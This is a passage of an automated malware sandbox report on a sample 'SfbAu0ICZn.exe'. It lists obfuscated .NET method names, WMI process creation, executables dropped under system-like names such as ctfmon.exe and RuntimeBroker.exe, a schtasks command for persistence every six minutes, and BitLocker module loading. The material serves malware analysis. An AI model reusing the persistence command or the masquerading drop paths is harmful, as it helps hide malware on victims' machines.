Source: SfbAu0ICZn.exe, SxT8I1IMtqTgVhXFvEF.cs	High entropy of concatenated method names: 'Dispose', 'DWMIh3M0an', 'HtnIv5m4VG', 'pQjIIUSo6x', 'cjLUW9oiq9QAOhmmQYpK', 'XK8h6ZoiB2XaGOgBKhNR', 'PfOM1Joicqq1s5B6r1Rc', 'AmDadQoibWV5D78SREAX', 'agHN2soi0KijP7F1hWON', 'ztsHw3oimCkemKaxkrY3'
Source: SfbAu0ICZn.exe, Kmrk3sjyNH4pxBEE4Ry.cs	High entropy of concatenated method names: 'aUpjZLY25p', 'w4DjxAHnR8', 'jr9jhrutuJ', 'I1yjv5MNrp', 'J2qjIX0oSY', 'XDBjPCRUD9', 'D3Kj55siOA', 'HDbjV4PWJM', 'FpMj93dF2g', 'ILqj7Oi02f'
Source: SfbAu0ICZn.exe, FG5tFCdAAdWSxd2eELx.cs	High entropy of concatenated method names: 'UMaHvADdoI', 'F2xL6EoJ6KMF82l55Z8e', 'f3i31koJDBbjOCS16kL5', 'VHZ2LooJax6LvsglSP5U', 'lAJClkoJGat1vJBPHqnb', 'kt5', 'T43dN3a7ga', 'ReadByte', 'get_CanRead', 'get_CanSeek'
Source: SfbAu0ICZn.exe, IFiYbJHJy4y0TZBATN0.cs	High entropy of concatenated method names: 'v8eH2L1fg5', 'k6r', 'ueK', 'QH3', 'BqTHqwtsR1', 'Flush', 'ReMHB3K8a5', 'bhGHcxPQUy', 'Write', 'BbGHbcBsfc'
Source: SfbAu0ICZn.exe, kjrrOwk7vUWlAFMlYrN.cs	High entropy of concatenated method names: 'wWLkl1mJM3', 'DoZwaioHWWvNC9wYSwtI', 'L6fGReoHgvTZYcwOliJk', 'yv0tFZoHtyRIdGbFZCNl', 'MkXDEFoHrdPfcJr9PmZl', 'KPQkAhWbMh', 'REekOmiY2B', 'jgckNqVP0y', 'yWFkjSbZeA', 'WJ8WxyoHLmjLhW2I1M74'
Source: SfbAu0ICZn.exe, XBy9NPX4KXUalK8tVCV.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'RYJoFC2LHSl', 'YASoXoW5A51', 'TO1NIjoTK39ixcMdAV2V', 'zBDhFioT4NRB3SZJ6cTT', 'A7oY8IoTRfpJS1ZyXtmp'
Source: SfbAu0ICZn.exe, byVDc5Tto2KJxuJHgBj.cs	High entropy of concatenated method names: 'mKBTW0oxsw', 'WpOTgApZDv', 'S2aTQ3mR3m', 'CiRTJumEmq', 'yk2TSXK2Vu', 'NSPkeKoQitvM5VC4BQ8h', 'LMHFwloQef55Gfma5Zmt', 'Momm2DoQUOWUQOhLcE9X', 'XupmAUoQf4uG8qD33AHK', 'BuHIKwoQL35TxHWHqOQc'
Source: SfbAu0ICZn.exe, gWk2qjchP58fUKeIkgF.cs	High entropy of concatenated method names: 'K4ncPn2U6i', 'QQyc7YDUOW', 'IDJcO5N29a', 'dpDcN0ropD', 'RRAcj66SrZ', 'yo9cKVYilb', 'aUpc406ncf', 'jkHcRX5KRJ', 'Dispose', 'uEPYVlo0yrBxyomFg84A'
Source: SfbAu0ICZn.exe, z46ps3YP9JvRDDg7wC0.cs	High entropy of concatenated method names: 'zYGYENSJl2', 'lr4YlelXJj', 'psPYw4vvPk', 'HiLiyWoZtK7xsQb542fo', 'RVqPBloZ6tBY0T65t8Re', 'xYbuhOoZGPIpRiAJ5nQA', 'T4XYjGFunB', 'XctYKYFbDL', 'MDdfT3oZUmuxhBHg6O9w', 'p8aCI2oZD5SgYEgVv0Qp'
Source: SfbAu0ICZn.exe, pIAAAcUbWx7AoYZh35u.cs	High entropy of concatenated method names: 'Ei4UmKesfc', 'sQLUpemvIA', 'U4rUzexF4f', 'BUTDnJLNsJ', 'US7DojEwtf', 'X6ED3nBKZZ', 'Et0DC04mVF', 'fKDDXQSxGJ', 'AJnDYKwF7U', 'AwnDuphbBP'
Source: SfbAu0ICZn.exe, HZsWoUZF3aOEpmA8FTH.cs	High entropy of concatenated method names: 'zu0ZyDWQA7', 'LAkZMLwt76', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'J6pZx6OAT5', 'method_2', 'uc7'
Source: SfbAu0ICZn.exe, GUkxu8TXY5T3VX3GOMY.cs	High entropy of concatenated method names: 'I3WTucI444', 'i0cTkOTbAf', 'WqnTFLoLHP', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'r5hT1RqX26'
Source: SfbAu0ICZn.exe, b1kJynkoxv3O0gdNxAs.cs	High entropy of concatenated method names: 'SVqkCTi4Jy', 'C2NkX3sBfP', 'VPEkYTmiFS', 'yeb2PPoHy3GIFYd5m4L3', 'bOPup5oHM4iiyLl7dEUC', 'OSSFCBoHxv4ZdgqwFYsN', 'rBPwIBoHhAryjrkKQFAx', 'FpL8MLoHvNdXYqmZ5lfp', 'NXpmTEoHI3Xb4p8VGor5', 'b20AZHoHPDEdhLT0DMBj'
Source: SfbAu0ICZn.exe, qAEhvn7l4IM26lFsDxy.cs	High entropy of concatenated method names: 'qju7LTmQ4G', 'JpsLPAoDYVMwKuoW2giS', 'cvVj0MoDChrDwNSI9PJj', 'iNZ7UgoDX3J8y10QuIEI', 'DD07T8rveR', 'Hll7ZYeoN7', 'hen7dLGQfr', 'aWUZqLoDnuvHCbjFPBw1', 'tLS104oDoFXcgBq40pEW', 'JNlgiioUpmw7QsbY5BLJ'
Source: SfbAu0ICZn.exe, frm6adEanHfdtfdh7HL.cs	High entropy of concatenated method names: 'EWbEmXPHDS', 'fqnEz34XGa', 'SGjEGHkLU3', 'UDLEtxDkfS', 'JhRErb3uaO', 'RpDEWSAQuv', 'K0BEgqh26c', 'bVEEQS68pv', 'genEJwmj9s', 'TweESth5e9'
Source: SfbAu0ICZn.exe, eSm4V3Tp8i2TXRUulDF.cs	High entropy of concatenated method names: 'DctZnwbZSV', 'RE0ZoAt0BT', 'Yd7', 'wU5Z3CKSRj', 'Kn2ZCYgS6B', 'GRFZXxT0Ti', 'l36ZYa9GDn', 'sObcmboQSrASSe9vM1DX', 'bj7L9BoQQk4RRpbeKrbA', 'fYvbGKoQJpgYxry6rcTX'
Source: SfbAu0ICZn.exe, VEv6xAbV5GyJr21qE77.cs	High entropy of concatenated method names: 'CgdrHPomXGN3U0eMSVGo', 'EHODGjomYmvw6ZIWi9SY', 'qDR0qEZDtG', 'IqvKwlom17RGT5UDGpOb', 'YaLhJPomyhOL8sw5MQdD', 'OaFpRjomMn5ytSFN22yg', 'BmQfnKomxSsd68U4fOpv', 'uNN9rSomh0p3EvKQ1q47', 'qAV3yTomvJDS4DkIlehM', 'ikJO3GomIVSXWRrwdRPa'
Source: SfbAu0ICZn.exe, hFJ0a7jS4xv6Rh6Iqq1.cs	High entropy of concatenated method names: 'AC9jqpdwGd', 'U6mjBXhheU', 'T2MjcQ44eC', 'BRBjbh9Rrv', 'QoEj0P4s6N', 'fHCUvCoGge6o9ZLQWukj', 'eqBNTPoGQRZ63Hc4saM7', 'COoN1voGJ8DRCVp2y4qW', 'L0C3vFoGSFgxZ63eQ6AJ', 'w1Gb8noG2PjH1Q7kQSnx'
Source: SfbAu0ICZn.exe, ktfLoUINshSZiLPrwSR.cs	High entropy of concatenated method names: 'u7g7hffxYt', 'tVo7voJsxI', 'aVDv5yoUtG0IRbSHHFTC', 'k6hAY5oU6O4eVhKcyjXa', 'xdsBjCoUGxhBQIHAEQfp', 'UbTTtQoUrgCJtyrJvxmu', 'nQB77kr54K', 'G0NCg3oUJiy0uvGQQDQA', 'aeZi2YoUggeaUog5Gy26', 'R1nHmqoUQH3CS8Qx5Suw'
Source: SfbAu0ICZn.exe, z8qi2JYSXt7rkeJwES7.cs	High entropy of concatenated method names: 'rAbY0Kdbqo', 'pUtYm3s5W7', 'X0hYpECTtd', 'C3OYzbAVE7', 'rgIunvgRDl', 'jRiuoh0B6s', 'tntu3YhxuR', 'MiM1snod9iiDEF05ylYo', 'DpJJOUod5IsqpJOKKw4o', 'J8mIEVodVgnyEMx9Tgre'
Source: SfbAu0ICZn.exe, cJP9euFOOnI9etudZrq.cs	High entropy of concatenated method names: 'lVeFjI9ge4', 'pRAkOfos6ZQItpPwSutu', 'q4Zi3JosGFd5KoOTfekf', 'vliWSQostuQtKyHomRDn', 'dGKJIwosrKqmXLi4wOpB', 'zaIGgvosDhRKRegvP1Rr', 'QT7su7osa561tQ534EK3', 'd0ptZXosWZnsJ2JMAyEj'
Source: SfbAu0ICZn.exe, TdrZZslpTpPEsNpoJUy.cs	High entropy of concatenated method names: 'qcuwn3pUlC', 'SMqwoc7dtV', 'JJ8w3NUXSh', 'TwAwC3EeNr', 'GBcwXLAiaM', 'PJ5wYY6avM', 'cyO2nhoWgZFHvFkNGDNn', 'xh5K0ioWrkSbewsMetk6', 'fuWMvuoWWn8mciHEJHSX', 'TLSSVBoWQSCHukXJDabo'
Source: SfbAu0ICZn.exe, K9YIb1m9USa2yo9o37k.cs	High entropy of concatenated method names: 'cVNmwiDapF', 'UxNmTqJVVJ', 'Is8mZIbQT8', 'rvPmdZ7l7U', 'UMkmHZdvBR', 'QuumsiWlvv', 'uHOmff6XGO', 's4TmLQxF0T', 'A4VmiXglAd', 'sDkmexhaRL'
Source: SfbAu0ICZn.exe, IvandD8G2hPyBIRYMXy.cs	High entropy of concatenated method names: 'PkH8rFEN4w', 'HS18WkKjpV', 'JZO8gcMLkp', 'BRJFj7oaNqmy1RryQcdy', 'VDuJ8KoaAdaMG9j5YUnP', 'FA2s9NoaOaH9b0h7J1cs', 'NtC2PnoajbCHda5aN4Mu', 'pV3w9joaKtkF5CAP1efN', 'fFKrIPoa4lhDaZWkn2P9'
Source: SfbAu0ICZn.exe, VPYXmLqZGUXklKum6Ny.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'RneqHOa0ma', 'YCUevxocscdhm17w7CRf', 'Da4UWnocfepCgaRvXowU', 'MejZSIocLTusaHiF0ZFy', 'oHxCgrociVi59tHO67Ns', 'tHTjEuocePiSC31fNAcl', 'HY5UhuocUNG54R8PB61P'
Source: SfbAu0ICZn.exe, wG1rvB8vQXnxuxLmHn1.cs	High entropy of concatenated method names: 'oZM88mM01K', 'bWnSaHoDBl36hfKhtLjE', 'OZ6rqfoDcjY8YJOP7EvZ', 'xg6GYyoD2TuujLTadvgA', 'm2hrntoDqNyrPmkqtk8l', 'X23HMxoDbArmP5xICxP1', 'oES8PudVyD', 'RAq1jvoDrQHFyLKeitwC', 'ydopHkoDWCjn14cN76wF', 'p3gpS2oDg9SWqjSF1o8Y'
Source: SfbAu0ICZn.exe, epxDg4V58FrO7UMRx2.cs	High entropy of concatenated method names: 'rkishJS5u', 'kKRy5moRTTQpUMCdZlYp', 'mW2q80oRZuHJ7N4aIni1', 'mBaZTtoRlDfAdPSlI0Ne', 'YWw7myoRw8lZEAu2SjPx', 'vlT71IRBe', 'KFv8wWMDi', 'zhCAoMmi3', 'tXdOmVWon', 'KbANLrgyU'
Source: SfbAu0ICZn.exe, fIQo3dCRd2Q2OQ18Ben.cs	High entropy of concatenated method names: 'WhwC6cf9D6', 'FVZCGrCC6N', 'r6QCtOc1I7', 'dkqvuKowt7uEAbgrIC5V', 'Gr0eSlowrCOdl6S7uesU', 'TqqqTlow69d458W5adJm', 'C7wvu6owGktoc2kC1d3q', 'id5ClJiag5', 'N8pCwepACx', 'KSQCTdJJkR'
Source: SfbAu0ICZn.exe, AFFDJOopW1SyamHRBJy.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'sHRoFouocvP', 'YASoXoW5A51', 'lhA4y5oEmV6SroVp0AAP', 'B3AxIwoEpiqnO1nFUPgP', 'FiRhv3oEzCOGeWi6KJmx', 'q9id1RolnwoalpQwjw7k'
Source: SfbAu0ICZn.exe, DCnMhhUZcjTN23jMFgv.cs	High entropy of concatenated method names: 'E50UHKUAn1', 'eSjUs4sN0k', 'hrTUfpMkWy', 'jPBUL8gxXB', 'Bc7UirsZ5V', 'OIGUewwJ94', 'tm1UU4jF6Y', 'YDmUDnNWep', 'EObUabYuNQ', 'myGU6eAtC7'
Source: SfbAu0ICZn.exe, cpNcSjk1bqQv7cEuvLo.cs	High entropy of concatenated method names: 'F7QkMe9shQ', 'NmHkxIB5cW', 'g2iHPPoH7BdUiK6eSHjl', 'G7DealoHVfKQaDXVl2UN', 'LlEOZsoH92yfJ1XVPEeG', 'eiymRToH8SNWXWqEAMo7', 'b54JqnoHA3YVv3Egmi4Y', 'o9x3uxoHOFlxVrR0V0Op', 'tr47KAoHNtkrVD7a2Lpx'
Source: SfbAu0ICZn.exe, OFrYr8KGpZDUaQo5765.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'fPuKrq6gjb', 'G5CKWUimMx', 'Dispose', 'D31', 'wNK'
Source: SfbAu0ICZn.exe, aG6NEY1joMAk0wBgC3S.cs	High entropy of concatenated method names: 'qnFf53oiTavLXjKBg9gF', 'zKiDpfoilUNSWnDLWAHe', 'pIgwQkoiwYY3hcYOm6mT', 'afnqWjoiZZAjUY0jAW9q', 'mEFvpJGO4S', 'iFhb10oiHeGUHCk6Rk5B', 'pkAkiEoiswPW8SA8UbVa', 'rEjCdSoifnh9ivCP6FEB', 'DOobfUoiLHwk31Fk2QHQ', 'mmCIolXKPr'
Source: SfbAu0ICZn.exe, vAS0jV4jJ87iqbVBBDj.cs	High entropy of concatenated method names: 'kfB44alrdM', 'QGG4Rei4ir', 'JKF4E85nNw', 'Au64lEInPQ', 's2q4wBXxLp', 'YIyrNrotW7FaIaa8mZcE', 'w4M4kxottvQ22o8kkEiE', 'yOB06MotrbWISiVLI1qy', 'XdnqyUotg5WiVAwl254b', 'z7oje3otQXW0HvRm2l7P'
Source: SfbAu0ICZn.exe, COr6OJkad7OPtpvDN4G.cs	High entropy of concatenated method names: 'fdwkcDYBag', 'wWRkbK2ctj', 'd0Xqq4osFchBDv5Sl5tg', 'BbbZjcosudt2pW2lQLTN', 'US5uxoosk2GXQlERy75U', 'XWP7Fdos1QwEaXdNjsmV', 'opekGD2Hyj', 'N81ktuLv6c', 'tUDkrTlyXd', 'z5WkWgSo7H'
Source: SfbAu0ICZn.exe, JjwDELmUo0Jch1SVRFO.cs	High entropy of concatenated method names: 'XMNoudgVaYT', 'eZCouHGs7Hh', 'k1cousV6ePF', 't18oufgckEx', 'DAhouLeoFtS', 'juUouit4eCw', 'R5HoueYQ2r7', 'tR8pYrSJTB', 'lZLouUP4tWx', 'Q0UouD7r6NG'
Source: SfbAu0ICZn.exe, aQwIDret7ogFOdBsZLa.cs	High entropy of concatenated method names: 'pLyoFKSOkxU', 'NtEeWiL22w', 'bP1eg727lE', 'Eq0eQ11CaB', 'HNXHtyoqOLHnVaagigHn', 'y0y8IfoqNIG7oldaqUUY', 'XDdP7loqjV66ukdjKL5M', 'eWX12goqKVbMSScwe6it', 'YxdyYkoq4sKO4PqckqOn', 'INNZFFoqRadDx3p943P7'
Source: SfbAu0ICZn.exe, qF3qwYFY2OhaVb1Hqhs.cs	High entropy of concatenated method names: 'O3I', 'P9X', 'OZioX4YKF37', 'vmethod_0', 'imethod_0', 'pvlxirosPTijJHt87r2D', 'knWyHjos5tbe0usYnVIL', 'x7xdvAosvrw2D5I7KZSF', 'qEhJ8JosIP91Xr2V0uQT', 'NLL4EcosV24ZAPCHAtKt'
Source: SfbAu0ICZn.exe, DnxteGsJ5e4l4vWRvlH.cs	High entropy of concatenated method names: 'g0OCVfo2n0eLDFKpVseN', 'pwoefVoSpClep8ZXUWTr', 'rKCnjboSz7yMciABh8g6', 't7ys2D5NTr', 'Mh9', 'method_0', 'QRasqiiNsK', 'A5rsBh82hL', 'MdfscE3jPg', 'ALesb98mUn'
Source: SfbAu0ICZn.exe, Towoqibn9JagmeBnu51.cs	High entropy of concatenated method names: 'vGobXMToAb', 'mx8bYhEOHy', 'D9xkqbo0WHBJ7rVaWPu0', 'VvlcKTo0tK6FnUUob6wV', 'kO01r0o0r3JK5xB2LlcR', 'UknasWo0g9Z0jJWYmXcT', 'ojkRwLo0Q0bpUPqhXOqh', 'p5Vb3vfwXd', 'qlIu1no0af8i58CgRiH2', 'djswWyo0Uam2mpkh14ae'
Source: SfbAu0ICZn.exe, gKfpUqFrgZR7VF7ew5L.cs	High entropy of concatenated method names: 'Ws5Fc6N5KD', 'gfh5Y0of1m2fuTdv9Vww', 'nkpYGlofyir0fRqmUHvQ', 'FbHylOofM2Ie1NllCEoU', 'P9X', 'vmethod_0', 'A56oXEUrXG7', 'imethod_0', 'FMs4ZJofupsrtAspg0Lu', 'AHSJX6ofXZv4YFiLHpjH'
Source: SfbAu0ICZn.exe, eh3rOQl2xu72aZxT0ry.cs	High entropy of concatenated method names: 'siNlBRbUsv', 'tqclcBuf8p', 'a20lbLRk4g', 'TNVl0uS2xr', 'Utjlm3KRY0', 'ByeiuhoWe517lCygCJyV', 'DOMiT5oWL13YaWa47pwV', 'FBKmvOoWiR0S9l7DpCWE', 'pyigGpoWU06VCs3ls7N8', 'Lg4c8RoWDgj0cXeN0Arj'
Source: SfbAu0ICZn.exe, dqFZvnCJCQemtfNld8P.cs	High entropy of concatenated method names: 'pRWXC5XO20', 'WfSXXcNpoE', 'Kh6XYZxdeF', 'O4HlvwoTX8FFYE2WoIy8', 'qPIjTKoTYPXIvyhJYgcq', 'd2SZiRoT3AtpBuHZMeNL', 'QC0nhaoTCP2JPwLFNIcw', 'AuXXMtVZpN', 'pVovcMoT1wkqRiCmMyYC', 'NYkgTfoTkSUZWIQ9M6uo'
Source: SfbAu0ICZn.exe, uHaXFwwDiaYP1KG5v6v.cs	High entropy of concatenated method names: 'pHnw6JwTHK', 'robwGL69KP', 'yGgwt72wFD', 'gDewr8IGKe', 'TK0wWjcAGW', 'QJBwgQ510T', 'mHVwQOVSZ9', 'qVrwJ6g9af', 'BtDwSVKyJD', 'vtuw2pCmAJ'
Source: SfbAu0ICZn.exe, L573u4F5kgVZ6Lufixu.cs	High entropy of concatenated method names: 'wdIF8ESHYV', 'BBfhIxosLsucJ7n6MUtA', 'yVDNpKosiLhJmYIMVb7n', 'AB4Sf4oseZWgpby9dylR', 'xM8F93H0h3', 'oMlWGPosZG0j6r5fPKir', 'L3KVkrosdhOjmAqu6U5Q', 'buKBTcosHDivZVLE6b1l', 'g9Df3foswaRqj9mtVpXE', 'FUwyxDosTFOuFov2m90s'
Source: SfbAu0ICZn.exe, SJBS6IAPq5RKHjqq1vp.cs	High entropy of concatenated method names: 'FoYrm9o6VYtaWhN4JKfI', 'Vso6rAo69iJHENbsE1lZ', 'id30G4o6PG3xxodJvVNa', 's3OHfFo65XDnD1kEMYvc', 'method_0', 'method_1', 'PQCAVAd6KM', 'nS1A990Ykv', 'JTXA7AZsSw', 'xCXA8LRYlj'
Source: SfbAu0ICZn.exe, tuV6TDuaYy7ImyRRubo.cs	High entropy of concatenated method names: 'dIrucaSl6b', 'lc1ubw9eMn', 'BW6u0D3VSg', 'cDr8OboHkKLVdriySxiv', 'oeZ8eaoHFd5i1gXAoB9P', 'Q8DTlRoHYp3FER2DgPBr', 'P2nxSToHuMXw2TyXudMN', 'HjLuGACXZT', 'IqtutdoN2x', 'SUlurUBn5t'
Source: SfbAu0ICZn.exe, UigqJZeZTpH3wkQ47Ok.cs	High entropy of concatenated method names: 'QZaeHKa16W', 'TsMes2Ffsf', 'hPYef6835N', 'x6feLH9YHB', 'U51ei9DPbw', 'lyNeejLe1X', 'E5geUf2A61', 'pJ6eDZQV7E', 'Oc8eak8VSM', 'kcBe6CiIVl'
Source: SfbAu0ICZn.exe, N1TXdpqi42vRGvH0glI.cs	High entropy of concatenated method names: 'aT8oFRYB8ST', 'VoNou4YBaJP', 'yQNxcJobubKTvFKOibxn', 'Xakt8XobkKZCmGhCA6dt', 'PYKQUqobMtivO8doOBHI', 'zAI7foob13xWTu29wmCW', 'Nf1VvHoby1acPObr8aDP', 'HB6C0mobx3hbRxGbckH4', 'imethod_0', 'VoNou4YBaJP'
Source: SfbAu0ICZn.exe, v6vQDWOhf8PU2Kl7G6e.cs	High entropy of concatenated method names: 'hPGjoxc6oT', 'R59C6poGj9606nldmUB6', 'SoWtijoGKh6IlPNqrPKb', 'CbpUWIoG4UJM4UjBcAeK', 'xSaOIDECC3', 'zk4OPqc4ul', 'p4LO5se35a', 'S9VOVrL2nK', 'bKcO90yHn5', 'zplO7A8kxK'
Source: SfbAu0ICZn.exe, iinsjiAMyDkpoElbObH.cs	High entropy of concatenated method names: 'Rrr', 'y1x', 'jwjoFOXbQop', 'jy2oFNCC2BT', 'CN3iaXoaB7ITSfuUTM1Z', 'peLDxRoacRM34SWNrSs0', 'aBtYACoabcY8hnQrjdCs', 'P8pdNCoa0uugTgKZ0E1I', 'UZRG0HoametolxdwWCi7', 'YR7TZNoapcjb8f0DPmI7'
Source: SfbAu0ICZn.exe, Oa0UJoRZPaIZPy7eOnO.cs	High entropy of concatenated method names: 'method_0', 'hfqRHiLYHt', 'mkYRsReu9p', 'm2IRfHREwn', 'RVpRLTBi4f', 'ilgRimEfC3', 'NqFReuOfAf', 'lhL1nKor7T171jybeLKS', 'RgTpVZorV5ywErSyXpIr', 'jtH4ANor9vd7GndeCNmn'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown

Executable created and started: C:\Windows\CbsTemp\ctfmon.exe

Source: C:\Recovery\opHipgZM6eS.exe	File created: C:\Users\user\Desktop\evmDrQmW.log	Jump to dropped file
Source: C:\Recovery\opHipgZM6eS.exe	File created: C:\Users\user\Desktop\OUqOeHbA.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Windows\CbsTemp\ctfmon.exe	Jump to dropped file
Source: C:\Recovery\opHipgZM6eS.exe	File created: C:\Users\user\Desktop\ySkKLEmm.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Recovery\RuntimeBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Users\user\Desktop\hyhVOtKH.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Users\user\Desktop\mdQBMGyp.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Users\user\Desktop\RZKXfllq.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Users\user\Desktop\DsQyKcEJ.log	Jump to dropped file
Source: C:\Recovery\opHipgZM6eS.exe	File created: C:\Users\user\Desktop\YLtwtTHn.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Recovery\opHipgZM6eS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Users\user\Desktop\IoSQRIuD.log	Jump to dropped file
Source: C:\Recovery\opHipgZM6eS.exe	File created: C:\Users\user\Desktop\oeGTbsrD.log	Jump to dropped file

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe

File created: C:\Windows\CbsTemp\ctfmon.exe

Jump to dropped file

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Users\user\Desktop\RZKXfllq.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Users\user\Desktop\IoSQRIuD.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Users\user\Desktop\hyhVOtKH.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Users\user\Desktop\DsQyKcEJ.log	Jump to dropped file
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File created: C:\Users\user\Desktop\mdQBMGyp.log	Jump to dropped file
Source: C:\Recovery\opHipgZM6eS.exe	File created: C:\Users\user\Desktop\YLtwtTHn.log	Jump to dropped file
Source: C:\Recovery\opHipgZM6eS.exe	File created: C:\Users\user\Desktop\OUqOeHbA.log	Jump to dropped file
Source: C:\Recovery\opHipgZM6eS.exe	File created: C:\Users\user\Desktop\ySkKLEmm.log	Jump to dropped file
Source: C:\Recovery\opHipgZM6eS.exe	File created: C:\Users\user\Desktop\oeGTbsrD.log	Jump to dropped file
Source: C:\Recovery\opHipgZM6eS.exe	File created: C:\Users\user\Desktop\evmDrQmW.log	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "opHipgZM6eSo" /sc MINUTE /mo 6 /tr "'C:\Recovery\opHipgZM6eS.exe'" /f

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
